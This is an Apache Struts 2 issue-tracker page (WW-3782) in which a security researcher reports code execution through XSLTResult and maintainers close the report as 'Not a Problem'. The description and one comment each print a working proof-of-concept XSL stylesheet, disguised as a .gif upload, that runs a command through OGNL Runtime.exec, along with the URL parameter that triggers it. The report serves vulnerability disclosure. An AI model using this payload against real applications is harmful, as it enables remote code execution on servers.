Struts 2
  1. Struts 2
  2. WW-3782

struts2框架XSLTResult本地文件代码执行漏洞

    Details

    • Type: Bug Bug
    • Status: Closed
    • Priority: Minor Minor
    • Resolution: Not a Problem
    • Affects Version/s: 2.3.1.2
    • Fix Version/s: 2.3.3
    • Component/s: Core Actions
    • Labels:
    • Flags:
      Patch

      Description

      http://www.inbreak.net/archives/319

      Reporter : kxlzx , Alibaba Security Team
      http://www.inbreak.net/
      struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。

      这是XSLTResult文件代码:

      http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
      //获取用户提交的"xslt.location"的值
      String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
      path = pathFromRequest;
      URL resource = ServletActionContext.getServletContext().getResource(path);
      //解析用户提交的文件地址为xslt
      templates = factory.newTemplates(new StreamSource(resource.openStream()));

      这段代码导致项目中只要有任何一个action使用了xsltResult,攻击者就可以让应用将解析攻击者上传的文件作xslt解析。

      示例一个使用了xsltResult的action:
      <action name="xslt" class="net.inbreak.xsltAction">
      <result type="xslt"/>
      </action>

      XSLT解析,允许执行java静态方法,所以,攻击者只要上传一个文件在服务器上

      例如:

      /upload/7758521.gif

      <?xml version="1.0" encoding="UTF-8" ?>
      <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
      version="1.0" xmlns:ognl="ognl.Ognl">
      <xsl:template match="/">
      <html>
      <body>
      <h2>hacked by kxlzx</h2>
      <h2>http://www.inbreak.net</h2>
      <exp>
      <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
      </exp>
      </body>
      </html>
      </xsl:template>
      </xsl:stylesheet>

      这个xsl文件解析时,会调用ognl中的
      ognl:getValue('@Runtime@getRuntime().exec("calc")', '')

      导致执行任意代码。

      一个xslt的返回action地址为

      http://www.inbreak.net/xslt.action

      那么,攻击者就可以提交

      http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif

      就会变成

        Activity

        Hide
        zhouyanming added a comment -

        哥们太搞了,天朝还没占领全世界

        Show
        zhouyanming added a comment - 哥们太搞了,天朝还没占领全世界
        Hide
        kxlzx added a comment -

        以前都是我用google翻译,这次推荐给大家用。

        If you can not read, open here.

        http://translate.google.com/#zh-CN|en|%E5%A6%82%E6%9E%9C%E4%BD%A0%E7%9C%8B%E4%B8%8D%E6%87%82%EF%BC%8C%E8%AF%B7%E6%89%93%E5%BC%80%E8%BF%99%E9%87%8C%E3%80%82

        Show
        kxlzx added a comment - 以前都是我用google翻译,这次推荐给大家用。 If you can not read, open here. http://translate.google.com/#zh-CN |en|%E5%A6%82%E6%9E%9C%E4%BD%A0%E7%9C%8B%E4%B8%8D%E6%87%82%EF%BC%8C%E8%AF%B7%E6%89%93%E5%BC%80%E8%BF%99%E9%87%8C%E3%80%82
        Hide
        Lukasz Lenart added a comment -

        W czym jest problem ?

        If you can not read, open here.

        http://translate.google.com/#pl|zh-CN|W%20czym%20jest%20problem%20%3F

        Show
        Lukasz Lenart added a comment - W czym jest problem ? If you can not read, open here. http://translate.google.com/#pl |zh-CN|W%20czym%20jest%20problem%20%3F
        Hide
        kxlzx added a comment -

        攻击者可以上传图片文件,执行任意代码

        If you can not read, open here.

        http://translate.google.cn/?hl=en#zh-CN|en|%E6%94%BB%E5%87%BB%E8%80%85%E5%8F%AF%E4%BB%A5%E4%B8%8A%E4%BC%A0%E5%9B%BE%E7%89%87%E6%96%87%E4%BB%B6%EF%BC%8C%E6%89%A7%E8%A1%8C%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81

        Show
        kxlzx added a comment - 攻击者可以上传图片文件,执行任意代码 If you can not read, open here. http://translate.google.cn/?hl=en#zh-CN |en|%E6%94%BB%E5%87%BB%E8%80%85%E5%8F%AF%E4%BB%A5%E4%B8%8A%E4%BC%A0%E5%9B%BE%E7%89%87%E6%96%87%E4%BB%B6%EF%BC%8C%E6%89%A7%E8%A1%8C%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81
        Hide
        Lukasz Lenart added a comment -

        First you're talking about some file upload issue with the XSLT plugin, next your're presenting some hardcoded code with call to static methods (which can be blocked by setting up configuration flag).

        And first of all, please report any security issues throughout security@struts.apache.org

        Show
        Lukasz Lenart added a comment - First you're talking about some file upload issue with the XSLT plugin, next your're presenting some hardcoded code with call to static methods (which can be blocked by setting up configuration flag). And first of all, please report any security issues throughout security@struts.apache.org
        Hide
        Lukasz Lenart added a comment -

        You mean, that your applications is taking a user file and uses it as an input for XSTL Result ? Without checking content of the file ? XSLT Result was designed to base on server side files and not to use any file uploaded by accidental user.

        It's exactly the same case when you aren't escaping input form parameters and use them directly in your SQL queries - it's called SQL injection.

        Show
        Lukasz Lenart added a comment - You mean, that your applications is taking a user file and uses it as an input for XSTL Result ? Without checking content of the file ? XSLT Result was designed to base on server side files and not to use any file uploaded by accidental user. It's exactly the same case when you aren't escaping input form parameters and use them directly in your SQL queries - it's called SQL injection.
        Hide
        kxlzx added a comment -

        if applications code like:
        <action name="xslt" class="net.inbreak.xsltAction">
        <result type="xslt"/>
        </action>

        then ,The attacker can upload a file:

        /upload/7758521.gif

        <?xml version="1.0" encoding="UTF-8" ?>
        <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
        version="1.0" xmlns:ognl="ognl.Ognl">
        <xsl:template match="/">
        <html>
        <body>
        <h2>hacked by kxlzx</h2>
        <h2>http://www.inbreak.net</h2>
        <exp>
        <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
        </exp>
        </body>
        </html>
        </xsl:template>
        </xsl:stylesheet>

        and open url
        http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif

        then applications will execute
        ognl:getValue('@Runtime@getRuntime().exec("calc")', '')

        so,if an application use the xslt result.

        local code execution vulnerability.

        Show
        kxlzx added a comment - if applications code like: <action name="xslt" class="net.inbreak.xsltAction"> <result type="xslt"/> </action> then ,The attacker can upload a file: /upload/7758521.gif <?xml version="1.0" encoding="UTF-8" ?> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0" xmlns:ognl="ognl.Ognl"> <xsl:template match="/"> <html> <body> <h2>hacked by kxlzx</h2> <h2> http://www.inbreak.net </h2> <exp> <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/> </exp> </body> </html> </xsl:template> </xsl:stylesheet> and open url http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif then applications will execute ognl:getValue('@Runtime@getRuntime().exec("calc")', '') so,if an application use the xslt result. local code execution vulnerability.
        Hide
        Rene Gielen added a comment -

        In this case, the application developer is responsible for validating and securing user input / upload before processing. Evaluating expressions is the core feature in XSLT result, as it is in Freemarker etc., and it is designed for templates that reside on the server side.

        Show
        Rene Gielen added a comment - In this case, the application developer is responsible for validating and securing user input / upload before processing. Evaluating expressions is the core feature in XSLT result, as it is in Freemarker etc., and it is designed for templates that reside on the server side.

          People

          • Assignee:
            Unassigned
            Reporter:
            kxlzx
          • Votes:
            0 Vote for this issue
            Watchers:
            0 Start watching this issue

            Dates

            • Created:
              Updated:
              Resolved:

              Development